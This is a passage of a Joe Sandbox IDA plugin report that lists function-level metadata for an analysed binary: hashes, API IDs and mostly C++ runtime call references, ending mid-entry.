                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalSection$Enter$Leave$H_prolog
                            • String ID:
                            • API String ID: 3611688910-0
                            • Opcode ID: 9a75d3944daacedd1612f391adb11c25558a3478b56561f4861fd6577db82494
                            • Instruction ID: be82eaf52be362a2a189a403c00c2ea7786056c823c26ae5aef6727efd013585
                            • Opcode Fuzzy Hash: 9a75d3944daacedd1612f391adb11c25558a3478b56561f4861fd6577db82494
                            • Instruction Fuzzy Hash: 0691EC71A00A15DFCB20DFA8D484BAEB7B5FF98310F50455EE89AA7241DB34A905CF64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004354B5
                              • Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D
                            • __EH_prolog.LIBCMT ref: 004354C0
                              • Part of subcall function 00476ADD: __EH_prolog.LIBCMT ref: 00476AE2
                              • Part of subcall function 004B0769: __EH_prolog.LIBCMT ref: 004B076E
                              • Part of subcall function 004AB703: std::_Deallocate.LIBCONCRT ref: 004AB733
                              • Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8
                              • Part of subcall function 0044E82C: __EH_prolog.LIBCMT ref: 0044E831
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$Deallocatestd::_$ExceptionException@8RaiseThrow
                            • String ID: )$1.38$l
                            • API String ID: 1125004306-1949618500
                            • Opcode ID: fe10530605e0fe42725c671ea38f7ed34cbff42a59f4ec96bc5b9941d7ffa79b
                            • Instruction ID: dba261fe0062bf89d8650e79bf07336141051845fe5bab8e8fe89a5f1e21508d
                            • Opcode Fuzzy Hash: fe10530605e0fe42725c671ea38f7ed34cbff42a59f4ec96bc5b9941d7ffa79b
                            • Instruction Fuzzy Hash: 1FF1F871C0528CEADB10EBA9DD45BDDBBB89F66308F2040EEE04567192EB741F44CB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00436C0A
                              • Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D
                            • __EH_prolog.LIBCMT ref: 00436C15
                              • Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8
                              • Part of subcall function 0044E82C: __EH_prolog.LIBCMT ref: 0044E831
                              • Part of subcall function 004D2AB3: __EH_prolog.LIBCMT ref: 004D2AB8
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$DeallocateExceptionException@8RaiseThrowstd::_
                            • String ID: &$1.38$_
                            • API String ID: 3026593090-314876670
                            • Opcode ID: e09106c08e21e75b184b01da6eca95a1b64b732683cb92e487bc23e682999e58
                            • Instruction ID: 9aa80d079675541da15c3140e1ac0f82289acfbc554f7e60ef93281b904c0eaf
                            • Opcode Fuzzy Hash: e09106c08e21e75b184b01da6eca95a1b64b732683cb92e487bc23e682999e58
                            • Instruction Fuzzy Hash: A2E10671C0528CE9DB11EBA8DD45BEDBBB4AF66308F1041EEE04567182EA741F88CB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00438244
                              • Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D
                            • __EH_prolog.LIBCMT ref: 0043824F
                              • Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8
                              • Part of subcall function 0044E82C: __EH_prolog.LIBCMT ref: 0044E831
                              • Part of subcall function 004D2AB3: __EH_prolog.LIBCMT ref: 004D2AB8
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$DeallocateExceptionException@8RaiseThrowstd::_
                            • String ID: &$1.38$v
                            • API String ID: 3026593090-1349925522
                            • Opcode ID: 511eeba0e771c8a041208774176eb99eb196e3b86e3b10de7801d62182a1edb9
                            • Instruction ID: 1f5cb23f1696570e12f9c8a59af54159a068e5083953ff1ade9c3c51970046d4
                            • Opcode Fuzzy Hash: 511eeba0e771c8a041208774176eb99eb196e3b86e3b10de7801d62182a1edb9
                            • Instruction Fuzzy Hash: 20E11771C0428CE9DB11EBA8DD45BEDBBB8AF66308F1040DEE04567192EE781F88C765
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog
                            • String ID: GetType() == kNumberType$IsArray()$IsObject()$m->name.IsString()
                            • API String ID: 3519838083-2893571818
                            • Opcode ID: bb1620fed73518d74523bada9baee671c1284c108569a62fb72e0ca95a1f504a
                            • Instruction ID: 060b823309b1ad59683174ad3ea1d653af472b11ad11056d46f369940099a37b
                            • Opcode Fuzzy Hash: bb1620fed73518d74523bada9baee671c1284c108569a62fb72e0ca95a1f504a
                            • Instruction Fuzzy Hash: 0FB1F671600600ABDB14AF25C8A2BEA7B95AF42354F14401EF54A9F3D2DF7D9D01C7B9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00418CBE
                              • Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D
                            • __EH_prolog.LIBCMT ref: 00418CC9
                            • gethostbyname.WS2_32(?), ref: 00418CFD
                            • _strlen.LIBCMT ref: 00418E12
                              • Part of subcall function 0041CF6B: __EH_prolog.LIBCMT ref: 0041CF70
                              • Part of subcall function 0041CECB: __Thrd_sleep.LIBCPMT ref: 0041CF5E
                              • Part of subcall function 0041CECB: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041CF30
                              • Part of subcall function 004161F3: __EH_prolog.LIBCMT ref: 004161F8
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$ExceptionException@8RaiseThrd_sleepThrowUnothrow_t@std@@@__ehfuncinfo$??2@_strlengethostbyname
                            • String ID: $
                            • API String ID: 3595494107-3993045852
                            • Opcode ID: c0ad4428dfc8bc6fc3f4618fe617a3049029279d9557b9f8e5128b3d1a1e3038
                            • Instruction ID: 9fa8e1347a3b5d6a324549be710af1b370aea4fd853bc4809eec5a16e8616f21
                            • Opcode Fuzzy Hash: c0ad4428dfc8bc6fc3f4618fe617a3049029279d9557b9f8e5128b3d1a1e3038
                            • Instruction Fuzzy Hash: 29D1707180425CEEDF15DBA4DC85BEEB7B8BF14304F1041AFE109A6192EB746B88CB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 004B2983
                            • std::_Lockit::_Lockit.LIBCPMT ref: 004B2992
                              • Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
                              • Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
                              • Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1
                            • std::locale::_Getfacet.LIBCPMT ref: 004B29B2
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004B29E9
                            • std::_Facet_Register.LIBCPMT ref: 004B29FF
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004B2A0C
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$H_prologLockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                            • String ID:
                            • API String ID: 1252875284-0
                            • Opcode ID: 202a26346cecd9aefb5768aadbd2006732c1901e8ba45af2b5a955188053243c
                            • Instruction ID: f7ca5fcf15a29ee73de0f63c4ec1933b637445bf0b6068ffe5ed26652d83c923
                            • Opcode Fuzzy Hash: 202a26346cecd9aefb5768aadbd2006732c1901e8ba45af2b5a955188053243c
                            • Instruction Fuzzy Hash: 8811A772E0052997CB14FBA4D905AEE7775FF84720F10026EF815B7291DF789A01C7A4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 004B2A28
                            • std::_Lockit::_Lockit.LIBCPMT ref: 004B2A37
                              • Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
                              • Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
                              • Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1
                            • std::locale::_Getfacet.LIBCPMT ref: 004B2A57
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004B2A8E
                            • std::_Facet_Register.LIBCPMT ref: 004B2AA4
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004B2AB1
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$H_prologLockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                            • String ID:
                            • API String ID: 1252875284-0
                            • Opcode ID: 51c68c6e5f0bdad96a5cd2fde2d68645632b674c3427c94835c50d3f68f9f0a4
                            • Instruction ID: c8886ba17a3d5485cd5e1aa7785e1a44f9bf67971395e215b002f34403b44444
                            • Opcode Fuzzy Hash: 51c68c6e5f0bdad96a5cd2fde2d68645632b674c3427c94835c50d3f68f9f0a4
                            • Instruction Fuzzy Hash: 01110A72E005299BCB20FBA4D905AEE7775FF94720F50022EF811B7291DB789E0187A4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 004B2ACD
                            • std::_Lockit::_Lockit.LIBCPMT ref: 004B2ADC
                              • Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
                              • Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
                              • Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1
                            • std::locale::_Getfacet.LIBCPMT ref: 004B2AFC
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004B2B33
                            • std::_Facet_Register.LIBCPMT ref: 004B2B49
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004B2B56
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$H_prologLockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                            • String ID:
                            • API String ID: 1252875284-0
                            • Opcode ID: 65ce447762173529b6536825b45d556c6ad68a1dfdabc986c51eb9bf05b57350
                            • Instruction ID: 1391fae416d80c1b39bd808fabaa72711b772ef6f3f2cacb19c242c4ba372aee
                            • Opcode Fuzzy Hash: 65ce447762173529b6536825b45d556c6ad68a1dfdabc986c51eb9bf05b57350
                            • Instruction Fuzzy Hash: 1511C432E045299BCB14FFA4D9059EEBB75EF84720F10065EF81567291DF789A0187A4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 004B2B72
                            • std::_Lockit::_Lockit.LIBCPMT ref: 004B2B81
                              • Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
                              • Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
                              • Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1
                            • std::locale::_Getfacet.LIBCPMT ref: 004B2BA1
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004B2BD8
                            • std::_Facet_Register.LIBCPMT ref: 004B2BEE
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004B2BFB
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$H_prologLockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                            • String ID:
                            • API String ID: 1252875284-0
                            • Opcode ID: eff65316c8d1bddb7be57a432636777433a33a1dae658c0c6c577b745bd00f5d
                            • Instruction ID: 0ffda2dfe26c43bc4056b07ad5696aae978b47293d48c948269ed516ba1da668
                            • Opcode Fuzzy Hash: eff65316c8d1bddb7be57a432636777433a33a1dae658c0c6c577b745bd00f5d
                            • Instruction Fuzzy Hash: A411C172E045299BCB18FFA4C905AEE7B75FF84720F10026EF811A7291DF789A01C7A4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 004B2C17
                            • std::_Lockit::_Lockit.LIBCPMT ref: 004B2C26
                              • Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
                              • Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
                              • Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1
                            • std::locale::_Getfacet.LIBCPMT ref: 004B2C46
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004B2C7D
                            • std::_Facet_Register.LIBCPMT ref: 004B2C93
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004B2CA0
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$H_prologLockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                            • String ID:
                            • API String ID: 1252875284-0
                            • Opcode ID: 56a66ee146ac4cbdd3be01a2bfd2a2dd40d2f6ea9210b31f2c1411a636807fd7
                            • Instruction ID: 2dcc7b35d4edc1ae001f1dfcbc206a6e3d61c6b6d06d438f9a0bd2069ddf3514
                            • Opcode Fuzzy Hash: 56a66ee146ac4cbdd3be01a2bfd2a2dd40d2f6ea9210b31f2c1411a636807fd7
                            • Instruction Fuzzy Hash: 4011E772D005299BCB10FFA4D905AEE7B75FF84720F50021EF815B7291DB789A0187E4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 004B2E7D
                            • std::_Lockit::_Lockit.LIBCPMT ref: 004B2E8C
                              • Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
                              • Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
                              • Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1
                            • std::locale::_Getfacet.LIBCPMT ref: 004B2EAC
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004B2EE3
                            • std::_Facet_Register.LIBCPMT ref: 004B2EF9
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004B2F06
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$H_prologLockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                            • String ID:
                            • API String ID: 1252875284-0
                            • Opcode ID: e9f1efcb30548e9e56ec2ab87a8486d8545c1c2fe74b22e49fea07ea815be4a4
                            • Instruction ID: afdd4069f02c412dbe3d57c8cccc2ad05612a5f581e3fcd064c8c3d27ab09a31
                            • Opcode Fuzzy Hash: e9f1efcb30548e9e56ec2ab87a8486d8545c1c2fe74b22e49fea07ea815be4a4
                            • Instruction Fuzzy Hash: E911A332E006299BCB14FBA5C905AEEBB75FF84720F14461EF815772D1DB789A018BA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog3.LIBCMT ref: 0058657D
                            • std::_Lockit::_Lockit.LIBCPMT ref: 00586587
                              • Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
                              • Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
                              • Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1
                            • std::locale::_Getfacet.LIBCPMT ref: 005865A7
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 005865DE
                            • std::_Facet_Register.LIBCPMT ref: 005865FD
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00586606
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
                            • String ID:
                            • API String ID: 2465509477-0
                            • Opcode ID: 728bac705d2dbfbe79f6e58030f12c29b71d89cdc6424652ec309150d387ddab
                            • Instruction ID: b1d9a8a20fde25a5080b252a2a8d5375113aa7026780cc94b7247eb34f0af1f4
                            • Opcode Fuzzy Hash: 728bac705d2dbfbe79f6e58030f12c29b71d89cdc6424652ec309150d387ddab
                            • Instruction Fuzzy Hash: E501CE32D0012A9BDF00FBA0C856ABD7B72BF84720F54011AE81177291DF78AA028796
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog3.LIBCMT ref: 0058692B
                            • std::_Lockit::_Lockit.LIBCPMT ref: 00586935
                              • Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
                              • Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
                              • Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1
                            • std::locale::_Getfacet.LIBCPMT ref: 00586955
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0058698C
                            • std::_Facet_Register.LIBCPMT ref: 005869AB
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 005869B4
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
                            • String ID:
                            • API String ID: 2465509477-0
                            • Opcode ID: c540214dbd9fd79dfc83ffccc5696e7092c841e996cdecf1f91a713145f39ea9
                            • Instruction ID: 888cae3a08cb71bc11ca5a5ba79301200541db8d5ea92d9fc258bc731e18622d
                            • Opcode Fuzzy Hash: c540214dbd9fd79dfc83ffccc5696e7092c841e996cdecf1f91a713145f39ea9
                            • Instruction Fuzzy Hash: 0C01E132D001298BCF01FBA0CC46ABD7B72BF80720F54051EE9117B2D1DF78AA028795
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog3.LIBCMT ref: 005869C8
                            • std::_Lockit::_Lockit.LIBCPMT ref: 005869D2
                              • Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
                              • Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
                              • Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1
                            • std::locale::_Getfacet.LIBCPMT ref: 005869F2
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00586A29
                            • std::_Facet_Register.LIBCPMT ref: 00586A48
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00586A51
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
                            • String ID:
                            • API String ID: 2465509477-0
                            • Opcode ID: e415e55a5d8efd876f87e92c500efcb556197f03e0ebf5557ea5fc5ef338edb2
                            • Instruction ID: ddebc9e008ff21db6ecf431c3f9dd0193040618675104334071ab59956850f81
                            • Opcode Fuzzy Hash: e415e55a5d8efd876f87e92c500efcb556197f03e0ebf5557ea5fc5ef338edb2
                            • Instruction Fuzzy Hash: 1C01CE32D0012A9BCF05FBA0DC46ABD7B76BF94720F54411AE8117B291DF78AA018785
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog3.LIBCMT ref: 00586A65
                            • std::_Lockit::_Lockit.LIBCPMT ref: 00586A6F
                              • Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
                              • Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
                              • Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1
                            • std::locale::_Getfacet.LIBCPMT ref: 00586A8F
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00586AC6
                            • std::_Facet_Register.LIBCPMT ref: 00586AE5
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00586AEE
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
                            • String ID:
                            • API String ID: 2465509477-0
                            • Opcode ID: 6bf8fae17d1c55b3f8095170f8c441afd9e57401c1fd8f899d30954374e1038b
                            • Instruction ID: dc492d7c1f575ad321867507ed50d752874cd23006525941ac5387cd1d2b70e4
                            • Opcode Fuzzy Hash: 6bf8fae17d1c55b3f8095170f8c441afd9e57401c1fd8f899d30954374e1038b
                            • Instruction Fuzzy Hash: 1F01E132E0012A87CF04FBA0C84AABD7B76BF84720F54811EE81177291DF78EE028785
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog3.LIBCMT ref: 00586B02
                            • std::_Lockit::_Lockit.LIBCPMT ref: 00586B0C
                              • Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
                              • Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
                              • Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1
                            • std::locale::_Getfacet.LIBCPMT ref: 00586B2C
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00586B63
                            • std::_Facet_Register.LIBCPMT ref: 00586B82
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00586B8B
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
                            • String ID:
                            • API String ID: 2465509477-0
                            • Opcode ID: 49cecdee1888ff5400594f79c7491ccf6bce1ad4eee74dd977a1469709a5cab3
                            • Instruction ID: 1b3b7bcabb26220a1d94978600dd4a2176515027811550b14c2acc6d44849b9a
                            • Opcode Fuzzy Hash: 49cecdee1888ff5400594f79c7491ccf6bce1ad4eee74dd977a1469709a5cab3
                            • Instruction Fuzzy Hash: B201E132E0012A8BCF00FBA0D846ABD7B76BF90725F54051EF8117B291DF78AE028795
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog3.LIBCMT ref: 00586E13
                            • std::_Lockit::_Lockit.LIBCPMT ref: 00586E1D
                              • Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
                              • Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
                              • Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1
                            • std::locale::_Getfacet.LIBCPMT ref: 00586E3D
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00586E74
                            • std::_Facet_Register.LIBCPMT ref: 00586E93
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00586E9C
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
                            • String ID:
                            • API String ID: 2465509477-0
                            • Opcode ID: a0745f80e65ae47ed21d8f54d65da73e1bc9d5e7202c31e1bd7239126e4643fa
                            • Instruction ID: 78f031dcd81d295256e0ad33f2ac7f59cc44e543bd457230b3793aba3787fe51
                            • Opcode Fuzzy Hash: a0745f80e65ae47ed21d8f54d65da73e1bc9d5e7202c31e1bd7239126e4643fa
                            • Instruction Fuzzy Hash: E501A575D0012987CF15FBA0C8469BE7B76BF94720F54011EF8117B2D1DF78AA018B95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog3.LIBCMT ref: 00586EB0
                            • std::_Lockit::_Lockit.LIBCPMT ref: 00586EBA
